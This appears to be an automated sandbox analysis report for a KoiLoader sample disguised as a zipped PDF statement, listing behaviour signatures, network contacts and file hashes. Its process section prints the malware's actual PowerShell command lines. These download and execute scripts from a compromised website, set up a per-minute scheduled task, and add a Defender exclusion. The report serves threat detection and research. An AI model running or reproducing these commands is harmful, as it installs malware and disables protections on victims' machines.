Analysis Overview
SHA256
f2a993d66e959f8358bcb7023095655856c9f9a172c20a1b92042077a05a7916
Threat Level: Known bad
The file 01_11_2024_stmnt.pdf.zip was found to be: Known bad.
Malicious Activity Summary
KoiLoader
Koiloader family
Detects KoiLoader payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Indicator Removal: Clear Persistence
System Location Discovery: System Language Discovery
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 16:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 16:49
Reported
2024-11-08 16:52
Platform
win11-20241007-en
Max time kernel
147s
Max time network
148s
Command Line
Signatures
KoiLoader
Koiloader family
Detects KoiLoader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: Clear Persistence
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\DllHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\01_11_2024_stmnt.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comma [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $g21Qt8Fs4AYjWaTive = New-Object Net.WebClient; $hto = $g21Qt8Fs4AYjWaTive.DownloadData('https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/stomachersjkl.php'); $g21Qt8Fs4AYjWaTive.DownloadFile('https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/destineziteQaJxo.php', 'gE1sWzFkjThmeR.js'); schtasks /create /sc minute /f /mo 1 /tr ([System.Text.Encoding]::UTF8.GetString($hto) + $env:programdata + '\' + ('gE1sWzFkjThmeR.js ' * 2)) /tn PVN5ibu1j;
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /f /mo 1 /tr "wscript C:\ProgramData\gE1sWzFkjThmeR.js gE1sWzFkjThmeR.js " /tn PVN5ibu1j
C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE C:\ProgramData\gE1sWzFkjThmeR.js gE1sWzFkjThmeR.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\BTB1F8IIM4QD.js -usebasi 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/vulvaehP4l.php'; schtasks /delete /tn gE1sWzFkjThmeR.js /f; wscript $env:programdata\BTB1F8IIM4QD.js "
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn gE1sWzFkjThmeR.js /f
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\ProgramData\BTB1F8IIM4QD.js
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php'; $l2 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z2E44DN04TE'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/sd2.ps1')"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(IWR -UseBasicParsing 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/sd2.ps1')
C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\ProgramData\r02510207-a8a1-401b-a8b2-969e44fe3fefr.js"
C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE C:\ProgramData\gE1sWzFkjThmeR.js gE1sWzFkjThmeR.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\BTB1F8IIM4QD.js -usebasi 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/vulvaehP4l.php'; schtasks /delete /tn gE1sWzFkjThmeR.js /f; wscript $env:programdata\BTB1F8IIM4QD.js "
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn gE1sWzFkjThmeR.js /f
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\ProgramData\BTB1F8IIM4QD.js
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php'; $l2 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zWXW5OK2POI'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\ProgramData\r02510207-a8a1-401b-a8b2-969e44fe3fefr.js"
C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE C:\ProgramData\gE1sWzFkjThmeR.js gE1sWzFkjThmeR.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\BTB1F8IIM4QD.js -usebasi 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/vulvaehP4l.php'; schtasks /delete /tn gE1sWzFkjThmeR.js /f; wscript $env:programdata\BTB1F8IIM4QD.js "
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn gE1sWzFkjThmeR.js /f
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\ProgramData\BTB1F8IIM4QD.js
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php'; $l2 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zF8XLPN799Z'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.scuoladanzalibellula.it | udp |
| IT | 185.81.0.180:443 | www.scuoladanzalibellula.it | tcp |
| US | 8.8.8.8:53 | 180.0.81.185.in-addr.arpa | udp |
| IT | 185.81.0.180:443 | www.scuoladanzalibellula.it | tcp |
| IT | 185.81.0.180:443 | www.scuoladanzalibellula.it | tcp |
| UA | 82.118.19.30:80 | 82.118.19.30 | tcp |
| IT | 185.81.0.180:443 | www.scuoladanzalibellula.it | tcp |
| UA | 82.118.19.30:80 | 82.118.19.30 | tcp |
| IT | 185.81.0.180:443 | www.scuoladanzalibellula.it | tcp |
| IT | 185.81.0.180:443 | www.scuoladanzalibellula.it | tcp |
| UA | 82.118.19.30:80 | 82.118.19.30 | tcp |
| IT | 185.81.0.180:443 | www.scuoladanzalibellula.it | tcp |
| IT | 185.81.0.180:443 | www.scuoladanzalibellula.it | tcp |
Files
memory/2420-2-0x00007FFDAFF53000-0x00007FFDAFF55000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3ar0i5dy.cbb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2420-11-0x00000262AEC90000-0x00000262AECB2000-memory.dmp
memory/2420-12-0x00007FFDAFF50000-0x00007FFDB0A12000-memory.dmp
memory/2420-13-0x00007FFDAFF50000-0x00007FFDB0A12000-memory.dmp
memory/2420-14-0x00007FFDAFF50000-0x00007FFDB0A12000-memory.dmp
memory/2420-18-0x00007FFDAFF50000-0x00007FFDB0A12000-memory.dmp
C:\ProgramData\gE1sWzFkjThmeR.js
| MD5 | 0254c2d1a7d15b9d28423157faddd95d |
| SHA1 | 7a60c13cbafa0aa8623d02c42c351140ad4b3d17 |
| SHA256 | d22f168b1c45f3a49c3b690a8e332a0bf9e794eedb31c531d995bf717f59df7f |
| SHA512 | 783ed7bc034fbcab8d17ed41b7613f7c6c290653a5bc5368090832aac056351e52fd38d2742d02f50b57dba425be49b8e5592687e16288baa8ff0be9b1bdd9d3 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5f4c933102a824f41e258078e34165a7 |
| SHA1 | d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee |
| SHA256 | d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2 |
| SHA512 | a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8117d1162c008cf731fe668d81f95ac0 |
| SHA1 | 1fdce919b160546d65f946726794b3331de06938 |
| SHA256 | 1081c6b484e3ce0572ea539029bc598ee7870cf099c5585bd52fbeee220c56b7 |
| SHA512 | 711cc338d15b6b36cad3e8ca1a57b0595991f060d24f39faa2b24a2c4ca08c07c82497ed8b1bfbc998452778d75fb24558d72062ef5ee6848d99e35068c5f188 |
C:\ProgramData\BTB1F8IIM4QD.js
| MD5 | 912da8884511d851c094313acb286e83 |
| SHA1 | c4ea3b7e3b74445d05da5fb5b7379b01bdb8f331 |
| SHA256 | 142819335ee7e922256832778f25fb85ef97bfa05e43a1aea6fb41d337222daa |
| SHA512 | c44459e9a63bc36b2ff7e9fc898cce9a67edf84fdbfc60d220dd4da42725383d91df3f62c3e6ba5584cb597d142619d515b57bf2abff2fcc24d0f07746eb910c |
memory/556-34-0x00000000031B0000-0x00000000031E6000-memory.dmp
memory/556-35-0x0000000005980000-0x0000000005FAA000-memory.dmp
memory/556-36-0x0000000005880000-0x00000000058A2000-memory.dmp
memory/556-37-0x0000000005FB0000-0x0000000006016000-memory.dmp
memory/556-38-0x0000000006020000-0x0000000006086000-memory.dmp
memory/556-44-0x0000000006110000-0x0000000006467000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 12ff85d31d9e76455b77e6658cb06bf0 |
| SHA1 | 45788e71d4a7fe9fd70b2c0e9494174b01f385eb |
| SHA256 | 1c60ff7821e36304d7b4bcdd351a10da3685e9376775d8599f6d6103b688a056 |
| SHA512 | fcc4084ab70e49821a3095eeac1ef85cf02c73fdb787047f9f6b345132f069c566581921fac98fab5ddec1a550c266304cce186e1d46957946b6f66dba764d2f |
memory/556-49-0x0000000006640000-0x000000000665E000-memory.dmp
memory/556-50-0x0000000006670000-0x00000000066BC000-memory.dmp
memory/556-51-0x0000000006980000-0x000000000699A000-memory.dmp
memory/556-52-0x0000000007D40000-0x00000000083BA000-memory.dmp
memory/556-53-0x00000000083D0000-0x00000000083D1000-memory.dmp
memory/556-55-0x00000000084C0000-0x00000000084CD000-memory.dmp
memory/2472-66-0x0000000007170000-0x00000000071A4000-memory.dmp
memory/2472-67-0x0000000070A30000-0x0000000070A7C000-memory.dmp
memory/2472-76-0x00000000071B0000-0x00000000071CE000-memory.dmp
memory/2472-77-0x00000000071D0000-0x0000000007274000-memory.dmp
memory/2472-78-0x0000000007380000-0x000000000738A000-memory.dmp
memory/2472-79-0x0000000007590000-0x0000000007626000-memory.dmp
memory/2472-80-0x0000000007510000-0x0000000007521000-memory.dmp
memory/2472-81-0x0000000007540000-0x000000000754E000-memory.dmp
memory/2472-87-0x0000000007550000-0x0000000007565000-memory.dmp
memory/2472-91-0x0000000007650000-0x000000000766A000-memory.dmp
memory/2472-92-0x0000000007640000-0x0000000007648000-memory.dmp
memory/4268-95-0x0000000007AB0000-0x0000000007AD2000-memory.dmp
memory/4268-96-0x0000000008890000-0x0000000008E36000-memory.dmp
memory/4268-97-0x0000000007B50000-0x0000000007B6A000-memory.dmp
memory/4268-98-0x0000000008330000-0x0000000008380000-memory.dmp
memory/4268-99-0x0000000008420000-0x00000000084B2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e591f0e5885a13c711258918f7942d40 |
| SHA1 | f595db3854c4225734d09c57b160f508f1b8d263 |
| SHA256 | 20fd65820b42594110d892aa8b5355366ffa1dc1b84d85745778a3ce8ad640ff |
| SHA512 | fbb3dbd4af3cfb59786d8a0e2d40b30eb25a47c7df6f53b75e580c0b05d1cb21941c1c74214b5f1b8e1c6a82d7112a87fbde01919a0d1cdacad08f99eab8f5d2 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | ac4917a885cf6050b1a483e4bc4d2ea5 |
| SHA1 | b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f |
| SHA256 | e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9 |
| SHA512 | 092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 64a4de6ca3e813d7e7a1eacae48e0c9c |
| SHA1 | 818b7103d28fc9fd55017cb655757720cb423d63 |
| SHA256 | d39af384eab6fe28e679d8e3b4fc9fa811c1df8d88b2dd9e6cf397c506095ae5 |
| SHA512 | 7e4b085e7593857d84949d8da281fa309c241c316011288bf1b96b3595c7a32f0739c876f007647db770951069ef0c683381843dee9f1821f7c0c62646ee93da |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 0a9da256ffcfe42119c7a351e5eaaa9c |
| SHA1 | c992b8e18cfc24faee739511beb5094189806177 |
| SHA256 | f4750e5af8c84626318382887c9c17e6555eff006af7d7e88cadd562ab2ee8ed |
| SHA512 | 451f4d470fe938a7c71d340f0711a9d1cb98f542138bd95584244471fa5f31beba8274699be1e497742ce91182dc9e308ca2d9ce3d004174a8228cca4c118672 |
C:\ProgramData\BTB1F8IIM4QD.js
| MD5 | e2086b7005e0a2b5715cf9688d114e65 |
| SHA1 | e1af673e8057943de2adfd133c1339b919d20f52 |
| SHA256 | 544973c6c46a48a9197a556900d8f92a22695858ba8595f17fc353b33889785e |
| SHA512 | fb3902147f1f217ce3f9abe7199b7741366f46c1ee5354a47877eff79727cc3be1107246d6be7cc85bb4044e6c672aa7dda3f1e25a4d74b714512a42803a86e8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e119f8fc8d416324e8424fa64fb60390 |
| SHA1 | 49dc914ed4f32b7e95849123404577f00100a855 |
| SHA256 | 1f26417ccfbf2853790ed0a7c78c9e9fee1a0c2ed7e09aad74425b44a20f667e |
| SHA512 | b1af0e41cc8ff75f6984a4c1ae06b2b65bea1bede4666b9227c654624666ef76de59275093721c3e4968a19116f911aae439b71327ce3ccd814ecff0accacdfe |
memory/2208-127-0x00000000078F0000-0x00000000078FD000-memory.dmp
C:\ProgramData\BTB1F8IIM4QD.js
| MD5 | d8ff77391671cf2c35c6046869666789 |
| SHA1 | cfe305868cfdffa983382ce929d8ea4ce1ee29cb |
| SHA256 | 747af2f4811a9f6d50e985a7f1945a767d4d4b9e2c1bee2d7e3570080fd3d6df |
| SHA512 | f1ec0856256e4c0c376737295784022bb4f32e237ce9a3df7890f2f1fd28448ee5cb72db967bd58fda925a554da72138f59f5a82a80480e481e70156d74fa05b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 371ac0b948586f6551359d1e5cc7ce6a |
| SHA1 | e2e3b8930edaec9752d2a87f9ce512a3dd320eeb |
| SHA256 | a187893f567559aa34c3a11386eb2553d56ede8e3ebec1394cdb44550bc3c7ae |
| SHA512 | 4c4c8c8dccef9569ea5c0decacbff5540487001edf779fe35ece83801e0f26f07e6f36faa8d576f0efa75fdd28593b632a39091a0d128503187320fe661bec6a |
memory/732-152-0x0000000007FD0000-0x0000000007FDD000-memory.dmp